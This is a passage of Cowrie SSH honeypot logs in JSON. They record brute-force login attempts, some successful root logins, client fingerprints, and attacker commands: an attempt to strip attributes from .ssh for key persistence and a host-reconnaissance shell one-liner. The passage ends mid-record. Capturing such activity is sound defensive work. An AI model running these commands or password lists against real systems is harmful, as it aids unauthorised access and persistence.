{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:52:38.133373Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"3.7","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:52:38.134396Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.session.closed","duration":"12.5","message":"Connection lost after 12.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:52:38.135359Z","src_ip":"212.227.235.229","session":"0e24d8b9b31e"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ2wsx1234","message":"login attempt [root/!QAZ2wsx1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:52:38.640293Z","src_ip":"212.227.235.229","session":"dd71463da862"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:52:39.170060Z","src_ip":"212.227.235.229","session":"dd71463da862"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:52:39.170740Z","src_ip":"212.227.235.229","session":"dd71463da862"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T20:52:39.171499Z","src_ip":"212.227.235.229","session":"dd71463da862"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":59395,"dst_ip":"1.2.3.4","dst_port":22,"session":"880ef563a76b","protocol":"ssh","message":"New connection: 80.94.95.112:59395 (1.2.3.4:22) [session: 880ef563a76b]","sensor":"my-vps","timestamp":"2025-08-26T20:52:44.074015Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T20:52:44.074928Z","src_ip":"80.94.95.112","session":"880ef563a76b"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T20:52:44.105468Z","src_ip":"80.94.95.112","session":"880ef563a76b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"noreen","message":"login attempt [admin/noreen] failed","sensor":"my-vps","timestamp":"2025-08-26T20:52:44.314351Z","src_ip":"80.94.95.112","session":"880ef563a76b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nokia5230","message":"login attempt [admin/nokia5230] failed","sensor":"my-vps","timestamp":"2025-08-26T20:52:45.346946Z","src_ip":"80.94.95.112","session":"880ef563a76b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nogard","message":"login attempt [admin/nogard] failed","sensor":"my-vps","timestamp":"2025-08-26T20:52:46.379470Z","src_ip":"80.94.95.112","session":"880ef563a76b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nika","message":"login attempt [admin/nika] failed","sensor":"my-vps","timestamp":"2025-08-26T20:52:47.413294Z","src_ip":"80.94.95.112","session":"880ef563a76b"}
{"eventid":"cowrie.login.failed","username":"admin","password":"nickolas","message":"login attempt [admin/nickolas] failed","sensor":"my-vps","timestamp":"2025-08-26T20:52:48.446137Z","src_ip":"80.94.95.112","session":"880ef563a76b"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:52:49.479017Z","src_ip":"80.94.95.112","session":"880ef563a76b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53114,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bde261a252f","protocol":"ssh","message":"New connection: 212.227.235.229:53114 (1.2.3.4:22) [session: 5bde261a252f]","sensor":"my-vps","timestamp":"2025-08-26T20:52:51.394016Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:52:51.397949Z","src_ip":"212.227.235.229","session":"5bde261a252f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:52:51.631083Z","src_ip":"212.227.235.229","session":"5bde261a252f"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T20:52:52.579858Z","src_ip":"212.227.235.229","session":"5bde261a252f"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":62558,"dst_ip":"1.2.3.4","dst_port":22,"session":"8dc5d8bdae65","protocol":"ssh","message":"New connection: 217.72.205.35:62558 (1.2.3.4:22) [session: 8dc5d8bdae65]","sensor":"my-vps","timestamp":"2025-08-26T20:53:09.197329Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:53:09.198407Z","src_ip":"217.72.205.35","session":"8dc5d8bdae65"}
{"eventid":"cowrie.session.connect","src_ip":"213.108.243.7","src_port":44779,"dst_ip":"1.2.3.4","dst_port":22,"session":"837f16a4e13f","protocol":"ssh","message":"New connection: 213.108.243.7:44779 (1.2.3.4:22) [session: 837f16a4e13f]","sensor":"my-vps","timestamp":"2025-08-26T20:54:42.464634Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:54:42.470875Z","src_ip":"213.108.243.7","session":"837f16a4e13f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T20:54:42.572484Z","src_ip":"213.108.243.7","session":"837f16a4e13f"}
{"eventid":"cowrie.login.success","username":"root","password":"1q@W3e","message":"login attempt [root/1q@W3e] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:54:43.012793Z","src_ip":"213.108.243.7","session":"837f16a4e13f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:54:43.316320Z","src_ip":"213.108.243.7","session":"837f16a4e13f"}
{"eventid":"cowrie.command.input","input":"ls -la /","message":"CMD: ls -la /","sensor":"my-vps","timestamp":"2025-08-26T20:54:43.317024Z","src_ip":"213.108.243.7","session":"837f16a4e13f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","size":1347,"shasum":"352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/352110e27ca54240da15349cfe3b896942c0edeb85990b5868f21c885813869f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:54:43.433574Z","src_ip":"213.108.243.7","session":"837f16a4e13f"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:54:43.434772Z","src_ip":"213.108.243.7","session":"837f16a4e13f"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:54:51.402817Z","src_ip":"212.227.235.229","session":"5bde261a252f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44500,"dst_ip":"1.2.3.4","dst_port":22,"session":"90c3e3ecb49c","protocol":"ssh","message":"New connection: 212.227.235.229:44500 (1.2.3.4:22) [session: 90c3e3ecb49c]","sensor":"my-vps","timestamp":"2025-08-26T20:55:17.569889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:55:20.333771Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:55:20.334810Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.login.success","username":"root","password":"54321","message":"login attempt [root/54321] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:55:24.060483Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:55:25.748148Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.749010Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.749750Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.751135Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.752301Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.819028Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.819757Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.820754Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.821429Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.822013Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.822498Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.823152Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:55:25.823710Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:55:26.805300Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.1","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:55:26.806197Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.session.closed","duration":"9.2","message":"Connection lost after 9.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:55:26.807242Z","src_ip":"212.227.235.229","session":"90c3e3ecb49c"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":42493,"dst_ip":"1.2.3.4","dst_port":22,"session":"907030ee7607","protocol":"ssh","message":"New connection: 80.94.95.15:42493 (1.2.3.4:22) [session: 907030ee7607]","sensor":"my-vps","timestamp":"2025-08-26T20:55:52.796390Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T20:55:52.797392Z","src_ip":"80.94.95.15","session":"907030ee7607"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T20:55:53.204866Z","src_ip":"80.94.95.15","session":"907030ee7607"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe","message":"login attempt [felipe/felipe] failed","sensor":"my-vps","timestamp":"2025-08-26T20:55:54.153092Z","src_ip":"80.94.95.15","session":"907030ee7607"}
{"eventid":"cowrie.login.failed","username":"felipe","password":"felipe1","message":"login attempt [felipe/felipe1] failed","sensor":"my-vps","timestamp":"2025-08-26T20:55:55.244329Z","src_ip":"80.94.95.15","session":"907030ee7607"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45472,"dst_ip":"1.2.3.4","dst_port":22,"session":"569032a4b16a","protocol":"ssh","message":"New connection: 212.227.235.229:45472 (1.2.3.4:22) [session: 569032a4b16a]","sensor":"my-vps","timestamp":"2025-08-26T20:55:55.343516Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:55:55.345357Z","src_ip":"212.227.235.229","session":"569032a4b16a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 